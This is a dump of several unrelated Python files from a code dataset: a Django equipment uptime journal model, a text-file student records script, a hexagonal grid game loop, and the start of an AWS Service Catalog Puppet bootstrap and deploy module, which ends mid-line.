main()\n","sub_path":"services/phenopackets.py","file_name":"phenopackets.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"321765573","text":"from datetime import timedelta, datetime, date\nfrom django.db import models\nfrom bitfield import BitField\n\nfrom ..constants import STATE_FLAGS, EVENT_CHOICES, STATE_CHOICES, STATE_SET\nfrom ..utils import req_date, stat_timedelta_for_report\n\n\nclass EquipmentManager(models.Manager):\n\n def get_queryset(self):\n return super(EquipmentManager, self).get_queryset().select_related('journal')\n\n\nclass Equipment(models.Model):\n\n \"\"\"\n Модель производственных единиц от Предприятия до Детали Оборудования\n \"\"\"\n plant = models.ForeignKey('self', blank=True, null=True, verbose_name='установка',\n related_name='parts', on_delete=models.CASCADE)\n name = models.CharField(max_length=50, verbose_name='на��менование')\n\n def __str__(self):\n if self.plant is None:\n plant_name = '\\\\'\n else:\n plant_name = self.plant\n return '{0} - {1}'.format(plant_name, self.name)\n\n class Meta:\n db_table = 'equipment'\n ordering = ['plant_id', 'name']\n verbose_name = 'оборудование'\n verbose_name_plural = 'оборудование'\n\n objects = EquipmentManager()\n\n @property\n def journal_id(self):\n if '_journal_cache' in self.__dict__:\n if self._journal_cache:\n return self._journal_cache.id\n else:\n return None\n else:\n return None\n\n @property\n def is_alive(self):\n res = True\n if self.journal_id:\n if self.journal.events.filter(event_code='sps'):\n res = False\n return res\n\n def unit_tree(self, only_alive=False):\n \"\"\"\n Description: Метод строит дерево (список) подчиненных объектов, включая отступ\n глубины вложенности.\n \"\"\"\n def get_knot_dict(units):\n res = {}\n for unit in units:\n if unit.plant_id in res:\n res[unit.plant_id].append(unit)\n else:\n res[unit.plant_id] = [unit]\n return res\n\n def get_tree(knot_dict, tree, ident=0, node=None):\n if node:\n if only_alive and not node.is_alive:\n return\n tree.append((node, ident))\n ident += 1\n for eq in knot_dict[node.id if node else None]:\n if eq.id in knot_dict:\n get_tree(knot_dict, tree, ident, eq)\n else:\n # Проверка для оборудования без составляющих\n if only_alive and not eq.is_alive:\n continue\n tree.append((eq, ident))\n\n units = Equipment.objects.all()\n tree = []\n knot_dict = get_knot_dict(units)\n get_tree(knot_dict, tree, 0, self)\n return tree\n\n def collect_sub_stat_on_date(self, stat_date):\n \"\"\"\n Description: Метод собирает все наличествующие записи статистики для дерева\n журналов (на базе дерева оборудования) от указанного узла.\n \"\"\"\n eq_list = self.unit_tree(only_alive=True)\n # Собрать все номера журналов для вычисленного дерева оборудования\n journal_set = {\n eq.journal_id for eq, ident in eq_list\n if eq.journal_id and not eq.journal.stat_by_parent\n }\n # для запроса существующих записей на дату\n records = Record.objects.filter(rdate=req_date(stat_date), journal_id__in=journal_set).all()\n journals_records = {rec.journal_id: rec for rec in records}\n res = []\n for eq, ident in eq_list:\n row = {}\n if eq.journal_id and not eq.journal.stat_by_parent:\n row['name'] = eq.name\n row['journal_id'] = eq.journal_id\n row['ident'] = ident\n if eq.journal_id in journals_records:\n row['rec_data'] = journals_records[eq.journal_id].data_dict()\n row['has_data'] = True\n else:\n row['rec_data'] = {'rdate': stat_date, 'up_cnt': 0, 'down_cnt': 0}\n for st_name, st_flag in eq.journal.control_flags:\n row['rec_data'][st_name] = '0:00'\n row['has_data'] = False\n res.append(row)\n elif not eq.journal_id:\n row['name'] = eq.name\n row['ident'] = ident\n res.append(row)\n return res\n\n\nclass JournalManager(models.Manager):\n\n def get_queryset(self):\n return super(JournalManager, self).get_queryset().select_related()\n\n\nclass Journal(models.Model):\n\n \"\"\"\n Модель Журнала записей статистики работы/простоя по конкретному\n оборудованию\n \"\"\"\n\n equipment = models.OneToOneField(Equipment, on_delete=models.CASCADE,\n related_name='journal', verbose_name='Оборудование')\n stat_by_parent = models.BooleanField(default=False, verbose_name='Статистика по установке')\n control_flags = BitField(\n flags=STATE_FLAGS,\n verbose_name='контроль',\n default=1\n )\n description = models.TextField(blank=True)\n\n objects = JournalManager()\n journal = JournalManager()\n\n class Meta:\n db_table = 'journals'\n ordering = ['equipment__name']\n verbose_name = 'журнал'\n verbose_name_plural = 'журналы'\n default_permissions = []\n permissions = (\n ('view_journal_details', 'View journal details'),\n ('view_journal_list', 'View journal list'),\n ('update_journal_description', 'Update journal description'),\n ('create_journal_record', 'Create record'),\n ('edit_journal_record', 'Edit record'),\n ('delete_journal_record', 'Delete record'),\n ('create_journal_event', 'Create journal event'),\n ('delete_journal_event', 'Delete journal event'),\n )\n\n @property\n def is_deregister(self):\n ev = self.events.order_by('-date').all()\n if ev and ev[0].event_code == 'sps':\n return True\n else:\n return False\n\n @property\n def state_cnt(self):\n return sum(1 for _ in filter(lambda x: x[1], self.control_flags))\n\n @property\n def state_list(self):\n return list(map(lambda x: x[0], filter(lambda x: x[1], self.control_flags)))\n\n def __str__(self):\n plant_name = self._equipment_cache.plant.name if self._equipment_cache.plant else '-'\n return plant_name + ' \\ ' + self._equipment_cache.name\n\n def write_record(self, rdate, **rdata):\n \"\"\"\n Description: Метод создает новую запись (или обновляет существующую)\n на основе входного словаря.\n \"\"\"\n # Разделяем словарь входных данных на то, что относится к записи\n # и то, что к интревалам\n rec_keys = rdata.keys() & {'rdate', 'down_cnt', 'up_cnt'}\n interval_keys = rdata.keys() & STATE_SET\n rec_argv = {key: rdata[key] for key in rec_keys}\n # Пробуем найти запись на эту дату\n try:\n rec = self.records.filter(rdate=req_date(rdate))[0]\n # Проверяем изменение данных записи\n changed_fields = []\n for name in rec_keys:\n if rec.__getattribute__(name) != rec_argv[name]:\n changed_fields.append(name)\n rec.__setattr__(name, rec_argv[name])\n rec.save(update_fields=changed_fields)\n # Изменяем (удаляем -> создаем) интервалы\n rec.intervals.all().delete()\n for key in interval_keys:\n rec.__setattr__(key, rdata[key])\n\n except IndexError:\n rec = self.records.create(rdate=req_date(rdate), **rec_argv)\n for key in interval_keys:\n rec.__setattr__(key, rdata[key])\n return rec\n\n def get_last_records(self, depth=10):\n \"\"\"\n Description: Метод возвращает выборку последних записей на нужную глубину.\n \"\"\"\n if self.stat_by_parent:\n return self.equipment.plant.journal.get_last_records(depth)\n else:\n return self.records.order_by('-rdate')[:depth]\n\n def switch_date_get_rec(self, curent_date_local, offset_str):\n \"\"\"\n Description: Метод переключает дату от заданной на нужное смещение\n и возвращает запись на новую дату при наличии.\n \"\"\"\n cur_date = datetime.strptime(curent_date_local, '%d.%m.%Y')\n new_date = cur_date + timedelta(int(offset_str))\n rset = self.records.filter(rdate=new_date.strftime(\"%Y-%m-%d\"))\n if rset.exists():\n return rset[0], new_date.strftime(\"%d.%m.%Y\")\n else:\n return None, new_date.strftime(\"%d.%m.%Y\")\n\n def delete_record(self, record_id):\n \"\"\"\n Description: Метод удаляет существующую запись статистики.\n \"\"\"\n rec = self.records.get(pk=record_id)\n rec.delete()\n\n def get_record_data(self, record_id):\n \"\"\"\n Description: Метод получения данных для инициализации полей формы\n существующей записью\n \"\"\"\n rec = self.records.get(pk=record_id)\n return rec.data_dict()\n\n def set_event_data(self, data):\n self.events.create(\n date=data['date'],\n event_code=data['event_code'])\n\n # Методы для формирования отчетов\n\n def get_stat(self, from_date=None, to_date=None, state_code='wrk', round_to_hour=True, sum_wrk_hrs=True):\n \"\"\"\n Description: Метод расчета суммарного времени нахождения в некотором состоянии\n (по умолчанию в работе) на временном интервале\n \"\"\"\n r_set = self.records\n if from_date:\n r_set = r_set.filter(rdate__gte=from_date)\n if to_date:\n r_set = r_set.exclude(rdate__gte=to_date)\n # По техническому заданию горячий резерв суммируется к работе в отчетах\n if state_code == 'wrk' and sum_wrk_hrs:\n r_set = r_set.filter(models.Q(intervals__state_code='wrk') | models.Q(intervals__state_code='hrs'))\n else:\n r_set = r_set.filter(intervals__state_code=state_code)\n total = r_set.aggregate(models.Sum('intervals__time_in_state'))['intervals__time_in_state__sum']\n return stat_timedelta_for_report(total, round_to_hour)\n\n def state_stat(self, from_date=None, to_date=None, round_to_hour=True, sum_wrk_hrs=True):\n \"\"\"\n Description: Метод расчета статистики нахождения во всех возможных состояниях\n на временном интервале (по умолчанию с ввода по текущий момент времени).\n Дополнтительно - число пусков и остановов.\n \"\"\"\n res = { state: self.get_stat(from_date, to_date, state, round_to_hour) for state in self.state_list }\n\n return res\n\n def full_stat(self):\n \"\"\"\n Dscription: Метод получения полной статистики для страницы журнала,\n включая пуски и остановы.\n \"\"\"\n try:\n evt = self.events.filter(event_code='zmn')[0]\n dt_from = evt.date.isoformat()\n except IndexError:\n dt_from = None\n if self.stat_by_parent:\n journal = self.equipment.plant.journal\n else:\n journal = self\n res = journal.state_stat(from_date=dt_from, round_to_hour=False)\n if dt_from:\n q_res = journal.records.filter(rdate__gte=dt_from).aggregate(\n models.Sum('up_cnt'),\n models.Sum('down_cnt'))\n else:\n q_res = journal.records.aggregate(\n models.Sum('up_cnt'),\n models.Sum('down_cnt'))\n res['down_cnt'] = q_res['down_cnt__sum']\n res['up_cnt'] = q_res['up_cnt__sum']\n return res\n\n def get_journal_or_subjournal(self, part_name=None):\n if part_name:\n eq = self.equipment\n try:\n part = eq.parts.filter(name=part_name)[0]\n return part.journal if part.journal else None\n except IndexError:\n return None\n else:\n return self\n\n def get_report_cell(self, summary_type='ITV', from_event='FVZ', date_to=None, date_from=None, round_to_hour=True):\n from_event_to_event_dict = {\n 'FVZ': 'zmn',\n 'FKR': 'vkr',\n 'FSR': 'vsr',\n 'FRC': 'vrc',\n }\n journal = self.equipment.plant.journal if self.stat_by_parent else self\n rec_set = journal.records # Начитаем готовить query_set здесь он еще не выполняется\n try:\n date_from_event = self.events.filter(\n event_code=from_event_to_event_dict[from_event]\n ).order_by('-date')[0].date\n if summary_type == 'DT':\n return date_from_event.strftime(\"%d.%m.%Y\")\n except IndexError:\n date_from_event = None\n if from_event != 'FVZ':\n return '-'\n elif summary_type == 'DT':\n return '-'\n if date_from_event:\n # Время \"от события\" откатываем на начало месяца, поскольку\n # капитальный и средный ремонты, замены и реконструкции\n # длятся не менее месяца, а раньше интервалы фиксировались\n # за месяц или год, что приводит к неверному расчету\n date_from_event = date(date_from_event.year, date_from_event.month, 1)\n # Теперь нужно выбрать дату от которой плясать\n # Если задано время начала отчета и было вычислено время \"от события\" - надо выбрать одно из двух\n if date_from and date_from_event:\n y, m, d = map(lambda x: int(x), date_from.split('-'))\n date_from = date_from if date(y, m, d) > date_from_event else date_from_event\n rec_set = rec_set.filter(rdate__gt=date_from)\n elif date_from:\n # Если задано время начала отчета, но нет времени события - использовать его как начало\n rec_set = rec_set.filter(rdate__gt=date_from)\n elif date_from_event:\n date_from = date_from_event\n rec_set = rec_set.filter(rdate__gt=date_from)\n\n # Если не задано ни то ни другое время - считаем все записи, предшествующие времени, т.е. не используем условие\n\n if date_to:\n rec_set = rec_set.exclude(rdate__gte=date_to)\n else:\n rec_set = rec_set.exclude(rdate__gte=date.today())\n if summary_type == 'PCN':\n cnt = rec_set.aggregate(models.Sum('up_cnt'))['up_cnt__sum']\n return str(cnt) if cnt else '-'\n elif summary_type == 'OCN':\n cnt = rec_set.aggregate(models.Sum('down_cnt'))['down_cnt__sum']\n return str(cnt) if cnt else '-'\n else:\n return journal.get_stat(\n from_date=date_from,\n to_date=date_to,\n state_code='wrk',\n round_to_hour=round_to_hour,\n )\n\n\nclass RecordManager(models.Manager):\n\n def get_queryset(self):\n return super(RecordManager, self).get_queryset().prefetch_related('intervals')\n\n\nclass StateDescriptor:\n\n def __init__(self, state_code):\n self.state_code = state_code\n\n def __get__(self, instance, owner):\n try:\n for interval in instance._prefetched_objects_cache['intervals']:\n if interval.state_code == self.state_code:\n return interval.stat_time\n except (AttributeError, KeyError):\n q_set = instance.intervals.filter(state_code=self.state_code)\n if q_set.exists():\n return q_set[0].stat_time\n else:\n return '0:00'\n return '0:00'\n\n def __set__(self, instance, value):\n if isinstance(value, str):\n try:\n hr, mnt = value.split(':')\n interval = timedelta(hours=int(hr), minutes=int(mnt))\n except ValueError:\n return 'Bad value for timedelta'\n elif isinstance(value, timedelta):\n interval = value\n else:\n return 'Bad value for timedelta'\n if interval != timedelta(0):\n instance.intervals.create(state_code=self.state_code, time_in_state=interval)\n\n\nclass Record(models.Model):\n\n journal = models.ForeignKey('Journal', on_delete=models.CASCADE,\n related_name='records')\n rdate = models.DateField()\n up_cnt = models.IntegerField(default=0)\n down_cnt = models.IntegerField(default=0)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n records = RecordManager()\n objects = RecordManager()\n\n class Meta:\n db_table = 'records'\n\n def data_dict(self):\n \"\"\"\n Description: Метод получения данных для инициализации полей формы\n существующей записью\n \"\"\"\n data = {}\n data['rdate'] = self.rdate.strftime('%d.%m.%Y')\n data['up_cnt'] = self.up_cnt\n data['down_cnt'] = self.down_cnt\n for st_name, st_flag in self.journal.control_flags:\n if st_flag:\n data[st_name] = self.__getattribute__(st_name)\n else:\n data[st_name] = '0:00'\n return data\n\n# Добавление динамических атрибутов для класса Record для обращения по имени состояния\n# Добавим новые состояния - изменится состав атрибутов\nfor state_name in STATE_SET:\n setattr(Record, state_name, StateDescriptor(state_name))\n\n\nclass IntervalItem(models.Model):\n\n record = models.ForeignKey('Record',\n related_name='intervals',\n on_delete=models.CASCADE)\n state_code = models.CharField(max_length=3,\n choices=STATE_CHOICES,\n default='wrk',\n db_index=True)\n time_in_state = models.DurationField()\n\n class Meta:\n db_table = 'intervals'\n default_permissions = []\n\n def __str__(self):\n return '%s>%s' % (self.state_code, self.stat_time)\n\n @property\n def stat_time(self):\n sec = self.time_in_state.total_seconds()\n hours, remainder = divmod(sec, 3600)\n minutes, sec = divmod(remainder, 60)\n return '%d:%02d' % (int(hours), int(minutes))\n\n\nclass EventItem(models.Model):\n\n \"\"\"\n Модель Отражение события жизненного цикла\n из предопределенного набора: [Ввод, Списание, Замена]\n \"\"\"\n\n journal = models.ForeignKey('Journal',\n related_name='events',\n on_delete=models.CASCADE)\n date = models.DateField()\n event_code = models.CharField(max_length=3,\n choices=EVENT_CHOICES)\n\n class Meta:\n db_table = 'event_items'\n default_permissions = []\n","sub_path":"etools/apps/uptime/models/journal_models.py","file_name":"journal_models.py","file_ext":"py","file_size_in_byte":20963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"428646536","text":"db = 'student.txt'\r\n\r\ndef insert(file_name, stud_name, roll_no, marks):\r\n num_lines = sum(1 for line in open(file_name))\r\n if num_lines == 0:\r\n stud_id = 1\r\n else:\r\n stud_id = num_lines + 1\r\n with open(file_name, 'a') as af:\r\n af.write(\"{},{},{},{}\\n\".format(stud_id, stud_name, roll_no, marks))\r\n print(\"Record Inserted !\")\r\n\r\n\r\ndef update(file_name, std_id, name, roll_no, marks):\r\n with open(file_name, 'r') as rf:\r\n lst_tuples = []\r\n for line in rf:\r\n line = tuple(line.strip('\\n').split(','))\r\n lst_tuples.append(line)\r\n # print(len(lst_tuples))\r\n if len(lst_tuples) == 0:\r\n print(\"Data Not Found In File\")\r\n return\r\n elif int(std_id) < 1 or int(std_id) > len(lst_tuples):\r\n print(\"Student Id Not Found Database\")\r\n return\r\n else:\r\n with open(file_name, 'w') as wf:\r\n given_id = std_id\r\n given_data = (name, roll_no, marks)\r\n for student in lst_tuples:\r\n stud_id, stud_name, roll_no, marks = student\r\n if stud_id == str(given_id):\r\n stud_name, roll_no, marks = given_data\r\n wf.write(\"{},{},{},{}\\n\".format(stud_id, stud_name, roll_no, marks))\r\n print(\"Record Updated !\")\r\n\r\n\r\ndef delete(file_name, std_id):\r\n with open(file_name, 'r') as rf:\r\n lst_tuples = []\r\n for line in rf:\r\n line = tuple(line.strip('\\n').split(','))\r\n lst_tuples.append(line)\r\n # print(len(lst_tuples))\r\n\r\n if len(lst_tuples) == 0:\r\n print(\"Data Not Found In File\")\r\n return\r\n elif int(std_id) < 1 or int(std_id) > len(lst_tuples):\r\n print(\"Student Id Not Found Database\")\r\n return\r\n else:\r\n given_id = std_id\r\n for i in lst_tuples:\r\n if i[0] == str(given_id):\r\n lst_tuples.remove(i)\r\n\r\n with open(file_name, 'w') as wf:\r\n for student in lst_tuples:\r\n stud_id, stud_name, roll_no, marks = student\r\n if int(stud_id) > int(given_id):\r\n wf.write(\"{},{},{},{}\\n\".format(int(stud_id) - 1, stud_name, roll_no, marks))\r\n else:\r\n wf.write(\"{},{},{},{}\\n\".format(stud_id, stud_name, roll_no, marks))\r\n\r\n print(\"Record Deleted !\")\r\n\r\n\r\ndef read(file_name):\r\n num_lines = sum(1 for line in open(file_name))\r\n if num_lines == 0:\r\n print(\"No Data Found !\")\r\n else:\r\n with open(file_name, 'r') as file:\r\n print(\"id|name|roll_no|marks\")\r\n for students in file:\r\n student = tuple(students.strip('\\n').split(','))\r\n stud_id, stud_name, roll_no, marks = student\r\n # print(student)\r\n print(\"{}|{}|{}|{}\".format(stud_id, stud_name, roll_no, marks))\r\n\r\n\r\ndef menu():\r\n print()\r\n print('------------MENU------------')\r\n print('1.SHOW ALL STUDENTS')\r\n print('2.INSERT NEW STUDENT')\r\n print('3.UPDATE EXISTING STUDENT')\r\n print('4.DELETE STUDENT')\r\n print('5.EXIT')\r\n\r\n\r\nmenu()\r\noption = input(\"Enter Option from Above Menu ! >> \")\r\n\r\nif option == '1':\r\n read(db)\r\nelif option == '2':\r\n name = input(\"Enter Student Name >> \")\r\n roll_no = input(\"Enter Student Roll Number >> \")\r\n marks = input(\"Enter Student Marks >> \")\r\n insert(db, stud_name=name, roll_no=roll_no, marks=marks)\r\nelif option == '3':\r\n std_id = input(\"Enter Student Id >> \")\r\n name = input(\"Enter Student Name To Update >> \")\r\n roll_no = input(\"Enter Student Roll Number To Update >> \")\r\n marks = input(\"Enter Student Marks To Update >> \")\r\n update(db, std_id=std_id, name=name, roll_no=roll_no, marks=marks)\r\nelif option == '4':\r\n std_id = input(\"Enter Student Id >> \")\r\n delete(db, std_id=std_id)\r\nelif option == '5':\r\n exit(0)\r\nelse:\r\n print(\"Please Enter Valid Input !\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"4/4_1_c.py","file_name":"4_1_c.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"333965757","text":"import ast\n\nfrom matplotlib import pyplot as plt\nfrom environment.hexagonal_grid import HexagonalGrid\nfrom environment.universal_action import UniversalAction\nfrom utils.config_parser import Config\n\n\ndef normal_game():\n env = HexagonalGrid(Config.win_multiplier)\n\n env.visualize(False)\n\n while True:\n # Check win condition\n if env.check_win_condition():\n print('Congratulations, you won!')\n break\n\n legal_actions = env.get_legal_actions()\n\n print('-----\\nLegal moves:')\n for action in legal_actions:\n print(f'From: {action[0]}, To: {action[1]}')\n print('-----')\n\n first_input = input('Enter start node: ')\n if first_input == 'q':\n break\n\n if first_input == 'undo':\n print('Action reversed')\n env.undo_action()\n env.visualize(False)\n continue\n\n try:\n start_node = tuple(ast.literal_eval(first_input))\n end_node = tuple(ast.literal_eval(input('Enter end node: ')))\n except:\n print('Invalid input, try again!')\n continue\n\n if (start_node, end_node) not in legal_actions:\n print('Illegal move, try again!')\n continue\n\n action = UniversalAction()\n action.action = (start_node, end_node)\n env.execute_action(action)\n env.visualize(False)\n\n plt.close()\n","sub_path":"src/utils/normal_game.py","file_name":"normal_game.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"177727891","text":"# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\nfrom pathlib import Path\n\nimport cfn_tools\nimport requests\nimport terminaltables\n\nimport shutil\nfrom threading import Thread\n\nimport pkg_resources\nimport yaml\nimport logging\nimport os\nimport click\nfrom datetime import datetime\n\nfrom jinja2 import Template\nfrom pykwalify.core import Core\nfrom betterboto import client as betterboto_client\n\nfrom servicecatalog_puppet import manifest_utils_for_launches\nfrom servicecatalog_puppet.workflow import management as management_tasks\nfrom servicecatalog_puppet.workflow import provisioning as provisioning_tasks\nfrom servicecatalog_puppet.workflow import runner as runner\nfrom servicecatalog_puppet.workflow import launch as launch_tasks\nfrom servicecatalog_puppet.workflow import (\n lambda_invocations as lambda_invocations_tasks,\n)\nfrom servicecatalog_puppet.workflow import (\n spoke_local_portfolios as spoke_local_portfolios_tasks,\n)\nfrom servicecatalog_puppet import config\nfrom servicecatalog_puppet import manifest_utils\nfrom servicecatalog_puppet import aws\n\nfrom servicecatalog_puppet import asset_helpers\nfrom servicecatalog_puppet import constants\n\nimport traceback\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\ndef cli(info, info_line_numbers):\n if info:\n logging.basicConfig(\n format=\"%(levelname)s %(threadName)s %(message)s\", level=logging.INFO\n )\n if info_line_numbers:\n logging.basicConfig(\n format=\"%(levelname)s %(threadName)s [%(filename)s:%(lineno)d] %(message)s\",\n datefmt=\"%Y-%m-%d:%H:%M:%S\",\n level=logging.INFO,\n )\n\n\ndef reset_provisioned_product_owner(f):\n puppet_account_id = config.get_puppet_account_id()\n current_account_id = puppet_account_id\n manifest = manifest_utils.load(f, puppet_account_id)\n\n task_defs = manifest_utils_for_launches.generate_launch_tasks(\n manifest, puppet_account_id, False, False\n )\n\n tasks_to_run = []\n for task in task_defs:\n task_status = task.get(\"status\")\n if task_status == constants.PROVISIONED:\n tasks_to_run.append(\n provisioning_tasks.ResetProvisionedProductOwnerTask(\n launch_name=task.get(\"launch_name\"),\n account_id=task.get(\"account_id\"),\n region=task.get(\"region\"),\n )\n )\n\n cache_invalidator = str(datetime.now())\n\n runner.run_tasks(\n puppet_account_id,\n current_account_id,\n tasks_to_run,\n 10,\n cache_invalidator=cache_invalidator,\n on_complete_url=None,\n )\n\n\ndef generate_tasks(\n f,\n puppet_account_id,\n executor_account_id,\n single_account=None,\n is_dry_run=False,\n execution_mode=\"hub\",\n cache_invalidator=\"now\",\n):\n should_use_sns = config.get_should_use_sns(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n )\n should_use_product_plans = config.get_should_use_product_plans(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n )\n\n return [\n launch_tasks.LaunchSectionTask(\n manifest_file_path=f.name,\n puppet_account_id=puppet_account_id,\n should_use_sns=should_use_sns,\n should_use_product_plans=should_use_product_plans,\n include_expanded_from=False,\n single_account=single_account,\n is_dry_run=is_dry_run,\n execution_mode=execution_mode,\n cache_invalidator=cache_invalidator,\n ),\n spoke_local_portfolios_tasks.SpokeLocalPortfolioSectionTask(\n manifest_file_path=f.name,\n puppet_account_id=puppet_account_id,\n should_use_sns=should_use_sns,\n should_use_product_plans=should_use_product_plans,\n include_expanded_from=False,\n single_account=single_account,\n is_dry_run=is_dry_run,\n execution_mode=execution_mode,\n cache_invalidator=cache_invalidator,\n ),\n lambda_invocations_tasks.LambdaInvocationsSectionTask(\n manifest_file_path=f.name,\n puppet_account_id=puppet_account_id,\n should_use_sns=should_use_sns,\n should_use_product_plans=should_use_product_plans,\n include_expanded_from=False,\n single_account=single_account,\n is_dry_run=is_dry_run,\n execution_mode=execution_mode,\n cache_invalidator=cache_invalidator,\n ),\n ]\n\n\ndef deploy(\n f,\n puppet_account_id,\n executor_account_id,\n single_account=None,\n num_workers=10,\n is_dry_run=False,\n is_list_launches=False,\n execution_mode=\"hub\",\n on_complete_url=None,\n):\n cache_invalidator = str(datetime.now())\n\n tasks_to_run = generate_tasks(\n f,\n puppet_account_id,\n executor_account_id,\n single_account,\n is_dry_run,\n execution_mode,\n cache_invalidator,\n )\n runner.run_tasks(\n puppet_account_id,\n executor_account_id,\n tasks_to_run,\n num_workers,\n is_dry_run,\n is_list_launches,\n execution_mode,\n cache_invalidator,\n on_complete_url,\n )\n\n\ndef graph(f):\n current_account_id = puppet_account_id = config.get_puppet_account_id()\n tasks_to_run = generate_tasks(f, puppet_account_id, current_account_id)\n lines = []\n nodes = []\n for task in tasks_to_run:\n nodes.append(task.graph_node())\n lines += task.get_graph_lines()\n click.echo(\"digraph G {\\n\")\n click.echo(\"node [shape=record fontname=Arial];\")\n for node in nodes:\n click.echo(f\"{node};\")\n for line in lines:\n click.echo(f'{line} [label=\"depends on\"];')\n click.echo(\"}\")\n\n\ndef _do_bootstrap_spoke(\n puppet_account_id,\n cloudformation,\n puppet_version,\n permission_boundary,\n puppet_role_name,\n puppet_role_path,\n):\n template = asset_helpers.read_from_site_packages(\n \"{}-spoke.template.yaml\".format(constants.BOOTSTRAP_STACK_NAME)\n )\n template = Template(template).render(VERSION=puppet_version)\n args = {\n \"StackName\": \"{}-spoke\".format(constants.BOOTSTRAP_STACK_NAME),\n \"TemplateBody\": template,\n \"Capabilities\": [\"CAPABILITY_NAMED_IAM\"],\n \"Parameters\": [\n {\n \"ParameterKey\": \"PuppetAccountId\",\n \"ParameterValue\": str(puppet_account_id),\n },\n {\n \"ParameterKey\": \"PermissionBoundary\",\n \"ParameterValue\": permission_boundary,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"Version\",\n \"ParameterValue\": puppet_version,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetRoleName\",\n \"ParameterValue\": puppet_role_name,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"PuppetRolePath\",\n \"ParameterValue\": puppet_role_path,\n \"UsePreviousValue\": False,\n },\n ],\n \"Tags\": [{\"Key\": \"ServiceCatalogPuppet:Actor\", \"Value\": \"Framework\",}],\n }\n cloudformation.create_or_update(**args)\n logger.info(\"Finished bootstrap of spoke\")\n\n\ndef bootstrap_spoke_as(\n puppet_account_id,\n iam_role_arns,\n permission_boundary,\n puppet_role_name,\n puppet_role_path,\n):\n cross_accounts = []\n index = 0\n for role in iam_role_arns:\n cross_accounts.append((role, \"bootstrapping-role-{}\".format(index)))\n index += 1\n\n with betterboto_client.CrossMultipleAccountsClientContextManager(\n \"cloudformation\", cross_accounts\n ) as cloudformation:\n _do_bootstrap_spoke(\n puppet_account_id,\n cloudformation,\n config.get_puppet_version(),\n permission_boundary,\n puppet_role_name,\n puppet_role_path,\n )\n\n\ndef _do_bootstrap(\n puppet_version,\n puppet_account_id,\n with_manual_approvals,\n puppet_code_pipeline_role_permission_boundary,\n source_role_permissions_boundary,\n puppet_generate_role_permission_boundary,\n puppet_deploy_role_permission_boundary,\n puppet_provisioning_role_permissions_boundary,\n cloud_formation_deploy_role_permissions_boundary,\n deploy_environment_compute_type,\n deploy_num_workers,\n source_provider,\n owner,\n repo,\n branch,\n poll_for_source_changes,\n webhook_secret,\n puppet_role_name,\n puppet_role_path,\n):\n click.echo(\"Starting bootstrap\")\n should_use_eventbridge = config.get_should_use_eventbridge(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n )\n if should_use_eventbridge:\n with betterboto_client.ClientContextManager(\"events\") as events:\n try:\n events.describe_event_bus(Name=constants.EVENT_BUS_NAME)\n except events.exceptions.ResourceNotFoundException:\n events.create_event_bus(Name=constants.EVENT_BUS_NAME,)\n\n all_regions = config.get_regions(\n puppet_account_id, os.environ.get(\"AWS_DEFAULT_REGION\")\n )\n with betterboto_client.MultiRegionClientContextManager(\n \"cloudformation\", all_regions\n ) as clients:\n click.echo(\"Creating {}-regional\".format(constants.BOOTSTRAP_STACK_NAME))\n threads = []\n template = asset_helpers.read_from_site_packages(\n \"{}.template.yaml\".format(\n \"{}-regional\".format(constants.BOOTSTRAP_STACK_NAME)\n )\n )\n template = Template(template).render(VERSION=puppet_version)\n args = {\n \"StackName\": \"{}-regional\".format(constants.BOOTSTRAP_STACK_NAME),\n \"TemplateBody\": template,\n \"Capabilities\": [\"CAPABILITY_IAM\"],\n \"Parameters\": [\n {\n \"ParameterKey\": \"Version\",\n \"ParameterValue\": puppet_version,\n \"UsePreviousValue\": False,\n },\n {\n \"ParameterKey\": \"DefaultRegionValue\",\n \"ParameterValue\": os.environ.get(\"AWS_DEFAULT_REGION\"),\n \"UsePreviousValue\": False,\n },\n ],\n \"Tags\": [{\"Key\": \"ServiceCatalogPuppet:Actor\", \"Value\": \"Framework\",}],\n }\n for client_region, client in clients.items():\n process = Thread(\n name=client_region, target=client.create_or_update, kwargs=args\n )\n process.start()\n threads.append(process)\n for process in threads:\n process.join()\n click.echo(\n \"Finished creating {}-regional\".format(constants.BOOTSTRAP_STACK_NAME)\n )\n\n source_args = {\"Provider\": source_provider}\n if source_provider == \"CodeCommit\":\n source_args.update(\n {\"Configuration\": {\"RepositoryName\": repo, \"BranchName\": branch,},}\n )\n elif source_provider == \"GitHub\":\n source_args.update(\n {\n \"Configuration\": {\n \"Owner\": owner,\n \"Repo\": repo,\n \"Branch\": branch,\n \"PollForSourceChanges\": poll_for_source_changes,\n \"SecretsManagerSecret\": webhook_secret,\n },\n }\n )\n\n with betterboto_client.ClientContextManager(\"cloudformation\") as cloudformation:\n click.echo(\"Creating 